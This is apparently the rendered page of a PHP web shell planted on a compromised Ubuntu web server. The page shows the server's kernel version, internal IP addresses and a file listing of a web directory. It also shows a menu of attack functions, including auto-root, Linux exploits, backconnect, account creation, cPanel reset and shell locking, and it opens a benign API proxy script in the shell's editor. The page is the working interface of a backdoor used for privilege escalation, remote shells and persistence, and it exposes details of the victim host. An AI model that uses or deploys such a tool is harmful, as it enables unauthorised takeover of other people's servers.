Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
orco /
out /
[ HOME SHELL ]
Name
Size
Permission
Action
_next
[ DIR ]
drwxr-xr-x
cesium_assets
[ DIR ]
drwxr-xr-x
404.html
6.72
KB
-rw-r--r--
api.php
1.42
KB
-rw-r--r--
cai.jpg
270.86
KB
-rw-r--r--
camera_icon.svg
725
B
-rw-r--r--
copy_icon.svg
318
B
-rw-r--r--
favicon.ico
25.32
KB
-rw-r--r--
focus_icon.svg
1.33
KB
-rw-r--r--
index.html
15.8
KB
-rw-r--r--
index.txt
2.74
KB
-rw-r--r--
options_icon.svg
296
B
-rw-r--r--
pause_icon.svg
761
B
-rw-r--r--
play_icon.svg
1.04
KB
-rw-r--r--
ssl.png
13.82
KB
-rw-r--r--
test.html
7.81
KB
-rw-r--r--
test.txt
2.93
KB
-rw-r--r--
up.svg
526
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.php
<?php $requestUri = $_SERVER['REQUEST_URI']; $requestMethod = $_SERVER['REQUEST_METHOD']; // Simple router for `/api` path switch ($requestMethod) { case 'GET': getTLE(); break; case 'POST': handleCollision(); break; default: http_response_code(404); echo json_encode(["message" => "Endpoint not found"]); break; } function getTLE() { $backendURL = "http://192.168.17.115/tle"; $response = file_get_contents($backendURL); if ($response === FALSE) { echo "Request failed."; } else { // $data = json_decode($response, true); header('Content-Type: application/json'); echo $response; } } function handleCollision() { $backendURL = "http://192.168.17.115/col"; $body = file_get_contents('php://input'); // Set up the options for the HTTP context $options = [ 'http' => [ 'method' => 'POST', 'header' => 'Content-Type: application/json', 'content' => $body, 'timeout' => 600 // Timeout in seconds ] ]; // Create the context $context = stream_context_create($options); // Send the request and capture the response $response = file_get_contents($backendURL, false, $context); if ($response === FALSE) { echo "Request failed."; } else { $data = json_decode($response, true); echo $response; } } ?>
Close